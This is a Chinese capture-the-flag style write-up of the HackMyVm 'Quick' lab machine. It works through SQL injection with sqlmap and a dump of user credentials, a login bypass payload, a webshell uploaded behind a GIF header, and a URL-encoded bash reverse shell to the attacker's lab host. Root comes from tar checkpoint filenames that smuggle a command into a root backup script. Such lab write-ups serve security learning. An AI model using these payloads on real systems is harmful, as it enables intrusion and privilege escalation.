首页 > 其他分享 >[HackMyVm] Quick

[HackMyVm] Quick

时间:2024-03-12 22:29:04浏览次数:29  
标签:Status www 56.113 -- 192.168 HackMyVm Quick Size

kali:192.168.56.104

主机发现

arp-scan -l
# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:2c:4f:35       PCS Systemtechnik GmbH
192.168.56.113  08:00:27:aa:84:13       PCS Systemtechnik GmbH

靶机:192.168.56.113

端口扫描

nmap 192.168.56.113
22/tcp open  ssh
80/tcp open  http

目录扫描

gobuster dir -u http://192.168.56.113 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/images               (Status: 301) [Size: 317] [--> http://192.168.56.113/images/]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 51414]
/.php                 (Status: 403) [Size: 279]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.113/img/]
/modules              (Status: 301) [Size: 318] [--> http://192.168.56.113/modules/]
/careers              (Status: 301) [Size: 318] [--> http://192.168.56.113/careers/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.113/css/]
/lib                  (Status: 301) [Size: 314] [--> http://192.168.56.113/lib/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.113/js/]
/customer             (Status: 301) [Size: 319] [--> http://192.168.56.113/customer/]
/404.html             (Status: 200) [Size: 5014]
/robots.txt           (Status: 200) [Size: 32]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.113/fonts/]
/employee             (Status: 301) [Size: 319] [--> http://192.168.56.113/employee/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]

发现比前几个quick系列多出来了employee目录

测试发现[email protected][email protected]'#结果相同,[email protected]'报错,说明存在sql注入

sqlmap跑一下请求包

sqlmap -l a.txt --batch --dbs
...
[*] `quick`
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

sqlmap -l a.txt --batch -D quick --tables
...
+-------+
| cars  |
| users |
+-------+

sqlmap -l a.txt --batch -D quick -T users --columns
+-----------------+-------------------------------------+
| Column          | Type                                |
+-----------------+-------------------------------------+
| name            | varchar(255)                        |
| role            | enum('admin','employee','customer') |
| email           | varchar(255)                        |
| id              | int                                 |
| password        | varchar(255)                        |
| profile_picture | varchar(255)                        |
+-----------------+-------------------------------------+
 
sqlmap -l a.txt --batch -D quick -T users -C "email,name,password,profile_picture" --dump

+------------------------+--------------+--------------------+----------------------+
| email                  | name         | password           | profile_picture      |
+------------------------+--------------+--------------------+----------------------+
| [email protected]      | Anna Lucky   | c1P35bcdw0mF3ExJXG | <blank>              |
| [email protected] | Andrew Speed | o30VfVgts73ibSboUP | uploads/3_andrew.jpg |
+------------------------+--------------+--------------------+----------------------+

字段就dump了几条没发现有用的东西,密码也登不上

但是登录界面可以用万能密码登上去

1' or 1#

找到一个上传点

上传一句话木马时候提示

 Invalid file type. Only JPEG, PNG, and GIF files are allowed.

添加一个GIF的文件头上传成功

根据数据库爆破出来的uploads/3_andrew.jpg猜测上传的头像位置在这

前面的数字试到2找到了文件位置

反弹shell

0=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.104%2F4567%20%200%3E%261'
www-data@quick4:/home$ ls
ls
andrew
coos
jeff
john
juan
lara
lee
mike
nick
user.txt

home目录下有user.txt

在查看进程的时候发现

CMD: UID=0    PID=26400  | /bin/bash /usr/local/bin/backup.sh 

backup.sh有root权限

www-data@quick4:/var/www$ cat /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html/
tar czf /var/backups/backup-website.tar.gz *

Linux提权系列 - tar - 掘金 (juejin.cn)

cd /var/www/html
echo "chmod u+s /usr/bin/bash" >shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
bash -p
www-data@quick4:/var/www/html$ echo "chmod u+s /usr/bin/bash" >shell.sh
echo "chmod u+s /usr/bin/bash" >shell.sh
www-data@quick4:/var/www/html$ echo "" > "--checkpoint-action=exec=sh shell.sh"
<l$ echo "" > "--checkpoint-action=exec=sh shell.sh"
www-data@quick4:/var/www/html$ echo "" > "--checkpoint=1"
echo "" > "--checkpoint=1"
www-data@quick4:/var/www/html$ bash =p
bash =p
bash: =p: No such file or directory
www-data@quick4:/var/www/html$ bash -p
bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
whoami]
bash: line 2: whoami]: command not found
whoami
root

标签:Status,www,56.113,--,192.168,HackMyVm,Quick,Size
From: https://blog.csdn.net/qq_34942239/article/details/136650466

相关文章

  • HackMyVm-venus(31-50)
    HackMyVm-venus(31-50)0x31(curl指定UA访问)#################MISSION31###################EN##Theuserveronicavisitsalothttp://localhost/waiting.phpkira@venus:~$curlhttp://localhost/waiting.php-A"PARADISE"QTOel6BodTx2cwX0x32(......
  • Blazor使用QuickGrid
    @usingMicrosoft.AspNetCore.Components.QuickGrid<PageTitle>PromotionGrid</PageTitle><h1>PromotionGridExample</h1><QuickGridItems="@people"><PropertyColumnProperty="@(p=>p.PersonId)"Sor......
  • HackMyVm-vens(21-30)
    HackMyVm-venus(21-30)0x21base64转图片#################MISSION0x21###################EN##Usereloisehassavedherpasswordinaparticularway.iris@venus:~$cateloise得到内容,找个在线网站转成图片密码yOUJlV0SHOnbSPm0x22十六进制转文本######......
  • redis自学(5)QuickList
    问题1:ZipList虽然节省内存,但申请内存必须是连续空间,如果内存占用较多,申请内存效率很低。怎么办?为了缓解这个问题,我们必须限制ZipList的长度和entry大小。问题2:但是我们要存储大量数据,超出了ZipList最佳的上限怎么办?我们可以创建多个ZipList来分片存储数据。问题3:数据拆分后比......
  • HackMyVm-venus(1-20)
    HackMyVm-venus(1-20)0x01隐藏文件查找#################MISSION0x01###################EN##Usersophiahassavedherpasswordinahiddenfileinthisfolder.Finditandloginassophia.hacker@venus:~$ls-altotal44drwxr-x---1roothacker......
  • quick3 - hackmyvm
    简介难度:简单靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick3本地环境虚拟机:vitualbox靶场IP(quick3):192.168.56.105跳板机IP(windows10):192.168.56.1 192.168.190.100渗透机IP(ubuntu22.04):192.168.190.30扫描小型靶场,nmap跑一下全端口即可nmap-p1-655......
  • quick2 - hackmyvm
    简介难度:简单靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick2本地环境虚拟机:vitualbox靶场IP(quick2):192.168.56.103跳板机IP(windows10):192.168.56.1 192.168.190.100渗透机IP(ubuntu22.04):192.168.190.30扫描小靶场,用nmap简单扫一下即可:nmap-p1-6553......
  • 压缩算法_quicklz接口demo
    1quicklz  quicklz是单片机上一个常见的压缩算法,具体原理没有文档和hash表的相关基础我就不去深究了;  只需要将fileSrc.txt放在桌面,代码可以使用vscode的mingw直接编译;2quicklz源码quicklz.h/***quicklz.h*********************************************************......
  • quickjs-emscripten webassembly 包
    quickjs-emscripten是基于emscripten将quickjsc版本,编译为了webassembly方便通过npm使用包含的特性支持node以及web使用安全的执行js(支持到es2020)quickjsruntime进行创建以及维护值暴露主机函数到quickjsruntime通过asyncify支持执行异步代码参考使用app.mjs......
  • Quick sort【1月19日学习笔记】
    点击查看代码//Quicksort#include<iostream>usingnamespacestd;intpartition(intA[],intstart,intend){ intpivot=A[end];//默认选取末尾为主元 intpIndex=start;//分区索引初始化 for(inti=start;i<end;i++){//从索引start开始扫描 if(A[i]<......